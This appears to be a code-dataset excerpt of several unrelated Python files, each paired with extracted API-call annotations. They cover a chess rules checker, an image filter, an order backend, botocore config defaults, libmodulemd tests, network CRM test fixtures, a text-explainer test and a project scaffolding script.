'(image)\n', (713, 720), False, 'import PIL\n'), ((1944, 1967), 'numpy.asarray', 'np.asarray', (['deconvolved'], {}), '(deconvolved)\n', (1954, 1967), True, 'import numpy as np\n'), ((809, 835), 'PIL.Image.fromarray', 'PIL.Image.fromarray', (['image'], {}), '(image)\n', (828, 835), False, 'import PIL\n'), ((852, 881), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), '(image)\n', (874, 881), False, 'import PIL\n')] |
from collections import defaultdict
import pieces
class RulesEnforcer(object):
"""
Enforces the rules of the game
Examines the move, and determines whether its a valid move or not.
"""
letter_dict = {'a':0,'b':1,'c':2,'d':3,'e':4,'f':5,'g':6,'h':7}
pos_letters = letter_dict.keys()
pos_nums = [1,2,3,4,5,6,7,8]
letter_dict_rev = dict((v,k) for k,v in letter_dict.iteritems())
possible_pieces = ['p','r','n','b','q','k']
def __init__(self):
pass
@staticmethod
def check_square(chessboard, coordinate):
"""
Takes as input a chess board and coordinate and outputs
what is inside that space
This is useful for a variable of purposes
"""
mycord = RulesEnforcer.coordinate_mapper(coordinate)
first = mycord[0]
second = mycord[1]
return chessboard[first][second]
@staticmethod
def possible_moves(chessboard, color, piece, coordinate):
"""return possible moves of a piece
a number of things need to be taken into a count
1. whether we are allowed to move the piece
input: piece, color, and coordinate of piece
output: all possible moves of the piece (lists of lists)
Example of a cooridinate: a2
"""
#if the coordinate is an array
if type(coordinate) == list:
coordinate = RulesEnforcer.coordinate_mapper_reverse(coordinate)
#break out coordinate into a list of len(2)
cords = list(coordinate)
cords[1] = int(cords[1])
#pawns
if piece == 'p':
pos_moves = pieces.Pawn.moves(cords, color, chessboard)
#rook
elif piece == 'r':
pos_moves = pieces.Rook.moves(cords, color, chessboard)
#knight
elif piece == 'n':
pos_moves = pieces.Knight.moves(cords, color, chessboard)
#bishop
elif piece == 'b':
pos_moves = pieces.Bishop.moves(cords, color, chessboard)
#queen
elif piece == "q":
pos_moves = pieces.Queen.moves(cords, color, chessboard)
#king
elif piece == "k":
pos_moves = pieces.King.moves(cords, color, chessboard)
else:
return "invalid inputs!"
return pos_moves
@staticmethod
def all_possible_moves(chessboard, color):
"""takes as input a chessboard and generates all possible moves
input:
color: color that you want to generate moves for, 'w' or 'b'
chessboard: 8x8 chessboard
output: dict of all possible moves
key: piece and position
value: list of list of possible moves
"""
#dict for storing all the moves
all_moves = defaultdict()
for cor1, row in enumerate(chessboard):
for cor2, square in enumerate(row):
if square.split('-')[0] == color:
piece = square.split('-')[1]
coordinate = [cor1, cor2]
moves = RulesEnforcer.possible_moves(chessboard, color, piece, coordinate)
if moves:
all_moves[RulesEnforcer.coordinate_mapper_reverse(coordinate)] = moves
return all_moves
@staticmethod
def remove_outofbound_moves(pos_moves):
"""remove moves that are out of range of the board
input: list of list of moves
output: list of list of moves, with out of bound moves removed
"""
to_remove = []
for i in range(len(pos_moves)):
if pos_moves[i][0] not in RulesEnforcer.pos_letters or pos_moves[i][1] not in RulesEnforcer.pos_nums:
to_remove.append(pos_moves[i])
for i in to_remove:
pos_moves.remove(i)
return pos_moves
@staticmethod
def collision_detection(move, color, chessboard):
"""
Collision detection for the chess game.
input:
move: the move i.e ['a',7]
color: white ('w') or black ('b')
chessboard: chessboard object
output: "friend" or "enemy" depending on what color you are and what the enemy color is
"""
try:
move = RulesEnforcer.coordinate_mapper(move)
except:
return False
x = move[0]
y = move[1]
try:
piece = chessboard[x][y]
except:
return False
if color == 'w' and piece.split('-')[0] == 'w':
return "friend"
elif color == 'b' and piece.split('-')[0] == 'b':
return "friend"
if color == 'w' and piece.split('-')[0] == 'b':
return "enemy"
elif color == 'b' and piece.split('-')[0] == 'w':
return "enemy"
else:
return "empty"
@staticmethod
def move_allowed(move, chessboard):
"""
Determine if the move is allowed
input:
move: the move
chessboard: chessboard object
output: boolean, whether the move is allowed or not
"""
pass
@staticmethod
def coordinate_mapper(mycoordinate):
"""takes as input a chess coordinate and maps it to the coordinate in the array
input: chess coordinate (ie a5)
output: coordinate of the array to be used in the chessboard
for example: [0,2]
"""
mycoordinate = list(mycoordinate)
starthor = RulesEnforcer.letter_dict[mycoordinate[0]]
startver = 7 - (int(mycoordinate[1]) - 1)
return [startver, starthor]
@staticmethod
def coordinate_mapper_reverse(myarray):
"""
Does the opposite of coordinate_mapper(). Takes as input array coordinates (ie. [0,5])
This method is useful if you
input: a length 2 list of array coordinates
output: chess coordinate (str)
example:
[7,0] -> a1
"""
#letter of cor
first_cor = RulesEnforcer.letter_dict_rev[myarray[1]]
#number of cor
second_cor = 8 - myarray[0]
return str(first_cor) + str(second_cor)
@staticmethod
def legal_move_checker(start, finish):
"""checks if a move is legal or not based on the type of piece"""
pass | [
"pieces.Bishop.moves",
"pieces.Knight.moves",
"pieces.Pawn.moves",
"pieces.King.moves",
"collections.defaultdict",
"pieces.Queen.moves",
"pieces.Rook.moves"
] | [((2898, 2911), 'collections.defaultdict', 'defaultdict', ([], {}), '()\n', (2909, 2911), False, 'from collections import defaultdict\n'), ((1670, 1713), 'pieces.Pawn.moves', 'pieces.Pawn.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1687, 1713), False, 'import pieces\n'), ((1782, 1825), 'pieces.Rook.moves', 'pieces.Rook.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1799, 1825), False, 'import pieces\n'), ((1902, 1947), 'pieces.Knight.moves', 'pieces.Knight.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1921, 1947), False, 'import pieces\n'), ((2024, 2069), 'pieces.Bishop.moves', 'pieces.Bishop.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2043, 2069), False, 'import pieces\n'), ((2145, 2189), 'pieces.Queen.moves', 'pieces.Queen.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2163, 2189), False, 'import pieces\n'), ((2264, 2307), 'pieces.King.moves', 'pieces.King.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2281, 2307), False, 'import pieces\n')] |
from skimage.util import img_as_float
from skimage import io, filters
# from skimage.viewer import ImageViewer
import numpy as np
def split_image_into_channels(image):
"""Look at each image separately"""
red_channel = image[:, :, 0]
green_channel = image[:, :, 1]
blue_channel = image[:, :, 2]
return red_channel, green_channel, blue_channel
def merge_channels(red, green, blue):
"""Merge channels back into an image"""
return np.stack([red, green, blue], axis=2)
def sharpen(image, a, b):
"""Sharpening an image: Blur and then subtract from original"""
blurred = filters.gaussian(image, sigma=10, multichannel=True)
sharper = np.clip(image * a - blurred * b, 0, 1.0)
return sharper
def channel_adjust(channel, values):
# preserve the original size, so we can reconstruct at the end
orig_size = channel.shape
# flatten the image into a single array
flat_channel = channel.flatten()
# this magical numpy function takes the values in flat_channel
# and maps it from its range in [0, 1] to its new squeezed and
# stretched range
adjusted = np.interp(flat_channel, np.linspace(0, 1, len(values)), values)
# put back into the original image shape
return adjusted.reshape(orig_size)
def gotham(
original_image,
r_boost_upper=1,
b_adjusted_upper=1,
blurriness=1.3,
subtraction=0.3,
amount_bluer_blacks=0.03,
):
original_image = img_as_float(original_image)
r, g, b = split_image_into_channels(original_image)
# np.linspace second argument
r_boost_lower = channel_adjust(r, np.linspace(0, r_boost_upper))
# amount of bluer_blacks
bluer_blacks = merge_channels(
r_boost_lower, g, np.clip(b + amount_bluer_blacks, 0, 1.0)
)
# amount blurriness, and subtraction
sharper = sharpen(bluer_blacks, blurriness, subtraction)
r, g, b = split_image_into_channels(sharper)
# np.linspace second argument
b_adjusted = channel_adjust(b, np.linspace(0, b_adjusted_upper))
return merge_channels(r, g, b_adjusted)
if __name__ == "__main__":
original_image = io.imread("data/input/sample.jpg")
output = gotham(original_image, b_adjusted_upper=3)
io.imsave("data/output/image-experiment/gotham.jpg", output)
| [
"numpy.clip",
"skimage.util.img_as_float",
"numpy.stack",
"skimage.io.imread",
"numpy.linspace",
"skimage.io.imsave",
"skimage.filters.gaussian"
] | [((460, 496), 'numpy.stack', 'np.stack', (['[red, green, blue]'], {'axis': '(2)'}), '([red, green, blue], axis=2)\n', (468, 496), True, 'import numpy as np\n'), ((607, 659), 'skimage.filters.gaussian', 'filters.gaussian', (['image'], {'sigma': '(10)', 'multichannel': '(True)'}), '(image, sigma=10, multichannel=True)\n', (623, 659), False, 'from skimage import io, filters\n'), ((674, 714), 'numpy.clip', 'np.clip', (['(image * a - blurred * b)', '(0)', '(1.0)'], {}), '(image * a - blurred * b, 0, 1.0)\n', (681, 714), True, 'import numpy as np\n'), ((1446, 1474), 'skimage.util.img_as_float', 'img_as_float', (['original_image'], {}), '(original_image)\n', (1458, 1474), False, 'from skimage.util import img_as_float\n'), ((2124, 2158), 'skimage.io.imread', 'io.imread', (['"""data/input/sample.jpg"""'], {}), "('data/input/sample.jpg')\n", (2133, 2158), False, 'from skimage import io, filters\n'), ((2219, 2279), 'skimage.io.imsave', 'io.imsave', (['"""data/output/image-experiment/gotham.jpg"""', 'output'], {}), "('data/output/image-experiment/gotham.jpg', output)\n", (2228, 2279), False, 'from skimage import io, filters\n'), ((1605, 1634), 'numpy.linspace', 'np.linspace', (['(0)', 'r_boost_upper'], {}), '(0, r_boost_upper)\n', (1616, 1634), True, 'import numpy as np\n'), ((1727, 1767), 'numpy.clip', 'np.clip', (['(b + amount_bluer_blacks)', '(0)', '(1.0)'], {}), '(b + amount_bluer_blacks, 0, 1.0)\n', (1734, 1767), True, 'import numpy as np\n'), ((1996, 2028), 'numpy.linspace', 'np.linspace', (['(0)', 'b_adjusted_upper'], {}), '(0, b_adjusted_upper)\n', (2007, 2028), True, 'import numpy as np\n')] |
from datetime import datetime
from backend.backend.classes_main import Order, OrderItemStateUpdate, OrderUpdate, StatusHistory
from backend.backend.exceptions import NoOrderFoundException
from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order
from backend.backend.delivery_integration import update_delivery_provider
from backend.backend.schemas import OrderSchema
async def fetch_orders():
orders = await get_orders()
return orders
async def create_new_order(order_dict: OrderSchema):
id = await create_order(order_dict)
return id
async def create_new_status_history(new_state: str):
status_history = StatusHistory(
response = '',
source = 1, # 1 is restaurant
status = new_state,
timeStamp = str(datetime.now()),
)
return status_history
async def update_order_state(update_data: OrderUpdate, existing_order: Order):
existing_order.status = update_data.new_order_state
status_history = await create_new_status_history(update_data.new_order_state)
existing_order.status_history.append(status_history)
await update_order_status(existing_order)
async def update_state(order_id: str, update_data: OrderUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_order_state(update_data, existing_order)
# When order status is updated we update the delivery provider
update_delivery_provider()
async def update_item_state(order_id: str, update_data: OrderItemStateUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_item_list(update_data, existing_order)
async def update_item_list(update_data: OrderItemStateUpdate, existing_order: Order):
for item in existing_order.items:
if item.name == update_data.item_name:
item.status = update_data.new_state
await update_items(existing_order)
| [
"backend.backend.repository.update_order_status",
"backend.backend.repository.get_orders",
"backend.backend.delivery_integration.update_delivery_provider",
"backend.backend.repository.get_order_by_id",
"backend.backend.repository.update_items",
"backend.backend.exceptions.NoOrderFoundException",
"dateti... | [((1540, 1566), 'backend.backend.delivery_integration.update_delivery_provider', 'update_delivery_provider', ([], {}), '()\n', (1564, 1566), False, 'from backend.backend.delivery_integration import update_delivery_provider\n'), ((473, 485), 'backend.backend.repository.get_orders', 'get_orders', ([], {}), '()\n', (483, 485), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((573, 597), 'backend.backend.repository.create_order', 'create_order', (['order_dict'], {}), '(order_dict)\n', (585, 597), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1150, 1185), 'backend.backend.repository.update_order_status', 'update_order_status', (['existing_order'], {}), '(existing_order)\n', (1169, 1185), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1279, 1304), 'backend.backend.repository.get_order_by_id', 'get_order_by_id', (['order_id'], {}), '(order_id)\n', (1294, 1304), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1347, 1405), 'backend.backend.exceptions.NoOrderFoundException', 'NoOrderFoundException', (['f"""Order by id {order_id} not found"""'], {}), "(f'Order by id {order_id} not found')\n", (1368, 1405), False, 'from backend.backend.exceptions import NoOrderFoundException\n'), ((1674, 1699), 'backend.backend.repository.get_order_by_id', 'get_order_by_id', (['order_id'], {}), '(order_id)\n', (1689, 1699), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1742, 1800), 'backend.backend.exceptions.NoOrderFoundException', 'NoOrderFoundException', (['f"""Order by id {order_id} not found"""'], {}), "(f'Order by id {order_id} not found')\n", (1763, 1800), False, 
'from backend.backend.exceptions import NoOrderFoundException\n'), ((2087, 2115), 'backend.backend.repository.update_items', 'update_items', (['existing_order'], {}), '(existing_order)\n', (2099, 2115), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((816, 830), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (828, 830), False, 'from datetime import datetime\n')] |
from botocore.configprovider import os, SmartDefaultsConfigStoreFactory
class AioSmartDefaultsConfigStoreFactory(SmartDefaultsConfigStoreFactory):
async def merge_smart_defaults(self, config_store, mode, region_name):
if mode == 'auto':
mode = await self.resolve_auto_mode(region_name)
default_configs = self._default_config_resolver.get_default_config_values(
mode)
for config_var in default_configs:
config_value = default_configs[config_var]
method = getattr(self, f'_set_{config_var}', None)
if method:
method(config_store, config_value)
async def resolve_auto_mode(self, region_name):
current_region = None
if os.environ.get('AWS_EXECUTION_ENV'):
default_region = os.environ.get('AWS_DEFAULT_REGION')
current_region = os.environ.get('AWS_REGION', default_region)
if not current_region:
if self._instance_metadata_region:
current_region = self._instance_metadata_region
else:
try:
current_region = \
await self._imds_region_provider.provide()
self._instance_metadata_region = current_region
except Exception:
pass
if current_region:
if region_name == current_region:
return 'in-region'
else:
return 'cross-region'
return 'standard'
| [
"botocore.configprovider.os.environ.get"
] | [((742, 777), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_EXECUTION_ENV"""'], {}), "('AWS_EXECUTION_ENV')\n", (756, 777), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n'), ((808, 844), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_DEFAULT_REGION"""'], {}), "('AWS_DEFAULT_REGION')\n", (822, 844), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n'), ((874, 918), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_REGION"""', 'default_region'], {}), "('AWS_REGION', default_region)\n", (888, 918), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n')] |
#!/usr/bin/python3
# This file is part of libmodulemd
# Copyright (C) 2017-2018 <NAME>
#
# Fedora-License-Identifier: MIT
# SPDX-2.0-License-Identifier: MIT
# SPDX-3.0-License-Identifier: MIT
#
# This program is free software.
# For more information on the license, see COPYING.
# For more information on free software, see
# <https://www.gnu.org/philosophy/free-sw.en.html>.
from os import path
import sys
try:
import unittest
import gi
gi.require_version("Modulemd", "2.0")
from gi.repository import Modulemd
from gi.repository.Modulemd import ModuleIndex
from gi.repository import GLib
except ImportError:
# Return error 77 to skip this test on platforms without the necessary
# python modules
sys.exit(77)
from base import TestBase
class TestModule(TestBase):
    """Tests for Modulemd.Module stream searching and obsoletes handling."""

    def test_search_streams(self):
        """search_streams should find exactly one matching stream per query."""
        idx = Modulemd.ModuleIndex.new()
        idx.update_from_file(path.join(self.test_data_path, "f29.yaml"), True)
        module = idx.get_module("nodejs")
        self.assertEqual(len(module.search_streams("8", 0)), 1)
        self.assertEqual(len(module.search_streams("10", 0)), 1)

    def test_copy_with_obsoletes(self):
        """Module.copy() must carry the active obsoletes over to the copy."""
        idx = Modulemd.ModuleIndex.new()
        e = Modulemd.Obsoletes.new(1, 2, "testmodule", "teststream", "testmsg")
        e.set_obsoleted_by("module_obsoleter", "stream_obsoleter")
        idx.add_obsoletes(e)
        m = idx.get_module("testmodule")
        assert m
        assert m.get_module_name() == "testmodule"
        obsoletes_from_orig = m.get_newest_active_obsoletes("teststream", None)
        assert (
            obsoletes_from_orig.get_obsoleted_by_module_name()
            == "module_obsoleter"
        )
        m_copy = m.copy()
        assert m_copy.get_module_name() == "testmodule"
        obsoletes_from_copy = m_copy.get_newest_active_obsoletes(
            "teststream", None
        )
        assert (
            obsoletes_from_copy.get_obsoleted_by_module_name()
            == "module_obsoleter"
        )

    def test_adding_obsoletes_is_order_independent(self):
        """The newest (by `modified`) obsoletes wins regardless of add order.

        Bug fix: the two local YAML documents were named backwards -- the
        document containing ``context: deadbeef`` used to be called
        ``obsoletes_without_context`` and vice versa. The names now match
        the content; both orderings are still exercised.
        """
        # Obsoletes event scoped to the deadbeef context (older `modified`).
        obsoletes_with_context = """
        ---
        document: modulemd-obsoletes
        version: 1
        data:
          module: nodejs
          stream: 10
          context: deadbeef
          modified: 2019-07-27T00:00Z
          message: test message
          obsoleted_by:
            module: nodejs
            stream: 12
        ...
        """
        # Context-free obsoletes event (newer `modified`, so it must win).
        obsoletes_without_context = """
        ---
        document: modulemd-obsoletes
        version: 1
        data:
          module: nodejs
          stream: 10
          modified: 2019-09-27T00:00Z
          message: test message
          obsoleted_by:
            module: nodejs
            stream: 14
        ...
        """
        for ordered_yaml in [
            obsoletes_with_context + obsoletes_without_context,
            obsoletes_without_context + obsoletes_with_context,
        ]:
            idx = ModuleIndex.new()
            stream = Modulemd.ModuleStream.new(2, "nodejs", "10")
            stream.props.context = "deadbeef"
            res = idx.add_module_stream(stream)
            res, failures = idx.update_from_string(ordered_yaml, True)
            m = idx.get_module("nodejs")
            streams = m.get_all_streams()
            s = streams[0]
            assert (
                s.get_obsoletes_resolved().get_obsoleted_by_module_stream()
                == "14"
            )
# Run the suite when executed directly; unittest discovers the Test* classes.
if __name__ == "__main__":
    unittest.main()
| [
"gi.repository.Modulemd.Obsoletes.new",
"os.path.join",
"gi.require_version",
"gi.repository.Modulemd.ModuleIndex.new",
"gi.repository.Modulemd.ModuleStream.new",
"sys.exit",
"unittest.main"
] | [((454, 491), 'gi.require_version', 'gi.require_version', (['"""Modulemd"""', '"""2.0"""'], {}), "('Modulemd', '2.0')\n", (472, 491), False, 'import gi\n'), ((3275, 3290), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3288, 3290), False, 'import unittest\n'), ((737, 749), 'sys.exit', 'sys.exit', (['(77)'], {}), '(77)\n', (745, 749), False, 'import sys\n'), ((856, 882), 'gi.repository.Modulemd.ModuleIndex.new', 'Modulemd.ModuleIndex.new', ([], {}), '()\n', (880, 882), False, 'from gi.repository import Modulemd\n'), ((1189, 1215), 'gi.repository.Modulemd.ModuleIndex.new', 'Modulemd.ModuleIndex.new', ([], {}), '()\n', (1213, 1215), False, 'from gi.repository import Modulemd\n'), ((1228, 1295), 'gi.repository.Modulemd.Obsoletes.new', 'Modulemd.Obsoletes.new', (['(1)', '(2)', '"""testmodule"""', '"""teststream"""', '"""testmsg"""'], {}), "(1, 2, 'testmodule', 'teststream', 'testmsg')\n", (1250, 1295), False, 'from gi.repository import Modulemd\n'), ((912, 954), 'os.path.join', 'path.join', (['self.test_data_path', '"""f29.yaml"""'], {}), "(self.test_data_path, 'f29.yaml')\n", (921, 954), False, 'from os import path\n'), ((2748, 2765), 'gi.repository.Modulemd.ModuleIndex.new', 'ModuleIndex.new', ([], {}), '()\n', (2763, 2765), False, 'from gi.repository.Modulemd import ModuleIndex\n'), ((2787, 2831), 'gi.repository.Modulemd.ModuleStream.new', 'Modulemd.ModuleStream.new', (['(2)', '"""nodejs"""', '"""10"""'], {}), "(2, 'nodejs', '10')\n", (2812, 2831), False, 'from gi.repository import Modulemd\n')] |
import logging
import time

import pytest

from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
    """Return the value of the ``--completeness_level`` CLI option.

    NOTE(review): the fixture name contains a typo ("conpleteness"); it is
    kept as-is because dependent tests request fixtures by this exact name.
    """
    return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
    """Withdraw all existing BGP routes for the tests, re-announcing on teardown.

    Yields a tuple ``(ipv4_route_used_before, ipv6_route_used_before)`` with
    the CRM route counters sampled after the withdrawal has settled.
    """
    ptf_ip = tbinfo["ptf_ip"]
    topo_name = tbinfo["topo"]["name"]
    logger.info("withdraw existing ipv4 and ipv6 routes")
    localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
    # Idiom fix: rely on truthiness instead of comparing with `== True`.
    wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq"))
    sleep_to_wait(CRM_POLLING_INTERVAL * 100)
    ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
    ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
    logger.info("ipv4 route used {}".format(ipv4_route_used_before))
    logger.info("ipv6 route used {}".format(ipv6_route_used_before))
    yield ipv4_route_used_before, ipv6_route_used_before
    # Teardown: re-announce the routes and wait for the CRM counters to settle.
    logger.info("announce existing ipv4 and ipv6 routes")
    localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
    wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq"))
    sleep_to_wait(CRM_POLLING_INTERVAL * 5)
    logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
    logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
| [
"logging.getLogger",
"utils.check_queue_status",
"utils.get_crm_resources",
"utils.sleep_to_wait",
"pytest.fixture"
] | [((235, 262), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (252, 262), False, 'import logging\n'), ((266, 296), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (280, 296), False, 'import pytest\n'), ((409, 453), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""', 'autouse': '(True)'}), "(scope='module', autouse=True)\n", (423, 453), False, 'import pytest\n'), ((919, 949), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (933, 949), False, 'import pytest\n'), ((1366, 1407), 'utils.sleep_to_wait', 'sleep_to_wait', (['(CRM_POLLING_INTERVAL * 100)'], {}), '(CRM_POLLING_INTERVAL * 100)\n', (1379, 1407), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1437, 1485), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv4_route"""', '"""used"""'], {}), "(duthost, 'ipv4_route', 'used')\n", (1454, 1485), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1515, 1563), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv6_route"""', '"""used"""'], {}), "(duthost, 'ipv6_route', 'used')\n", (1532, 1563), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2037, 2076), 'utils.sleep_to_wait', 'sleep_to_wait', (['(CRM_POLLING_INTERVAL * 5)'], {}), '(CRM_POLLING_INTERVAL * 5)\n', (2050, 2076), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2121, 2169), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv4_route"""', '"""used"""'], {}), "(duthost, 'ipv4_route', 'used')\n", (2138, 2169), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((2216, 2264), 'utils.get_crm_resources', 'get_crm_resources', (['duthost', '"""ipv6_route"""', '"""used"""'], {}), "(duthost, 'ipv6_route', 'used')\n", (2233, 2264), False, 'from utils import 
get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1318, 1352), 'utils.check_queue_status', 'check_queue_status', (['duthost', '"""inq"""'], {}), "(duthost, 'inq')\n", (1336, 1352), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n'), ((1988, 2023), 'utils.check_queue_status', 'check_queue_status', (['duthost', '"""outq"""'], {}), "(duthost, 'outq')\n", (2006, 2023), False, 'from utils import get_crm_resources, check_queue_status, sleep_to_wait\n')] |
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# Tests for classical explainer
from interpret_text.experimental.classical import ClassicalTextExplainer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from utils_test import get_mnli_test_dataset
DOCUMENT = "rare bird has more than enough charm to make it memorable."
class TestClassicalExplainer(object):
    """Smoke tests for ClassicalTextExplainer."""

    def test_working(self):
        """Sanity check that the harness runs."""
        assert True

    def test_explain_model_local(self):
        """explain_local should yield one importance value per feature."""
        train_df = get_mnli_test_dataset('train')
        sentences = train_df['sentence1']
        genres = train_df['genre']
        X_train, _X_test, y_train, _y_test = train_test_split(
            sentences, genres, train_size=0.8, test_size=0.2
        )
        encoder = LabelEncoder()
        y_train_encoded = encoder.fit_transform(y_train)
        explainer = ClassicalTextExplainer()
        _classifier, _best_params = explainer.fit(X_train, y_train_encoded)
        explainer.preprocessor.labelEncoder = encoder
        explanation = explainer.explain_local(DOCUMENT)
        assert len(explanation.local_importance_values) == len(explanation.features)
| [
"sklearn.model_selection.train_test_split",
"utils_test.get_mnli_test_dataset",
"sklearn.preprocessing.LabelEncoder",
"interpret_text.experimental.classical.ClassicalTextExplainer"
] | [((747, 777), 'utils_test.get_mnli_test_dataset', 'get_mnli_test_dataset', (['"""train"""'], {}), "('train')\n", (768, 777), False, 'from utils_test import get_mnli_test_dataset\n'), ((895, 958), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_str', 'ylabels'], {'train_size': '(0.8)', 'test_size': '(0.2)'}), '(X_str, ylabels, train_size=0.8, test_size=0.2)\n', (911, 958), False, 'from sklearn.model_selection import train_test_split\n'), ((984, 998), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (996, 998), False, 'from sklearn.preprocessing import LabelEncoder\n'), ((1074, 1098), 'interpret_text.experimental.classical.ClassicalTextExplainer', 'ClassicalTextExplainer', ([], {}), '()\n', (1096, 1098), False, 'from interpret_text.experimental.classical import ClassicalTextExplainer\n')] |
import argparse
from create_python_app.path_utils import *
from create_python_app.create_gitignore_file import create_gitignore_file
from create_python_app.create_license_file import create_license_file
from create_python_app.create_makefile_file import create_makefile_file
from create_python_app.create_readme_file import create_readme_file
from create_python_app.create_requirements_file import create_requirements_file
from create_python_app.create_setup_file import create_setup_file
from create_python_app.create_root_package import create_root_package
from create_python_app.create_config_files import create_config_files
from create_python_app.create_config_module import create_config_module
def _parse():
parser = argparse.ArgumentParser()
parser.add_argument("--name", required=True, type=str)
args = parser.parse_args()
return args.name
def main():
    """Scaffold a new Python application in the current working directory."""
    app_name = _parse()
    base_dir = create_dir(os.getcwd(), app_name)
    # Each step: (creator callable, whether it also needs the app name).
    # Order matters; it mirrors the original scaffolding sequence.
    steps = (
        (create_gitignore_file, False),
        (create_license_file, False),
        (create_makefile_file, True),
        (create_readme_file, True),
        (create_requirements_file, False),
        (create_setup_file, False),
        (create_root_package, True),
        (create_config_files, False),
        (create_config_module, True),
    )
    for creator, wants_name in steps:
        if wants_name:
            creator(base_dir, app_name=app_name)
        else:
            creator(base_dir)
if __name__ == '__main__':
main() | [
"create_python_app.create_readme_file.create_readme_file",
"argparse.ArgumentParser",
"create_python_app.create_config_module.create_config_module",
"create_python_app.create_root_package.create_root_package",
"create_python_app.create_setup_file.create_setup_file",
"create_python_app.create_gitignore_fil... | [((729, 754), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (752, 754), False, 'import argparse\n'), ((956, 987), 'create_python_app.create_gitignore_file.create_gitignore_file', 'create_gitignore_file', (['base_dir'], {}), '(base_dir)\n', (977, 987), False, 'from create_python_app.create_gitignore_file import create_gitignore_file\n'), ((992, 1021), 'create_python_app.create_license_file.create_license_file', 'create_license_file', (['base_dir'], {}), '(base_dir)\n', (1011, 1021), False, 'from create_python_app.create_license_file import create_license_file\n'), ((1026, 1075), 'create_python_app.create_makefile_file.create_makefile_file', 'create_makefile_file', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1046, 1075), False, 'from create_python_app.create_makefile_file import create_makefile_file\n'), ((1080, 1127), 'create_python_app.create_readme_file.create_readme_file', 'create_readme_file', (['base_dir'], {'app_name': 'app_name'}), '(base_dir, app_name=app_name)\n', (1098, 1127), False, 'from create_python_app.create_readme_file import create_readme_file\n'), ((1132, 1166), 'create_python_app.create_requirements_file.create_requirements_file', 'create_requirements_file', 